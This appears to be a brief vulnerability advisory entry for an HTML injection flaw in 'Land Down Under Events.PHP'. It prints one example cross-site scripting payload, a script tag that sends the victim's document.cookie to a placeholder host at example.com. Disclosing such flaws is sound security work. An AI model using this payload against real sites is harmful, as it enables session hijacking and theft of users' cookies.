• info
• discussion
• exploit
• solution
• references

Land Down Under Events.PHP HTML Injection Vulnerability

No exploit is required.

An example has been provided:

<script>document.location="http://www.example.com/script?cookie="+escape(document.cookie)</script>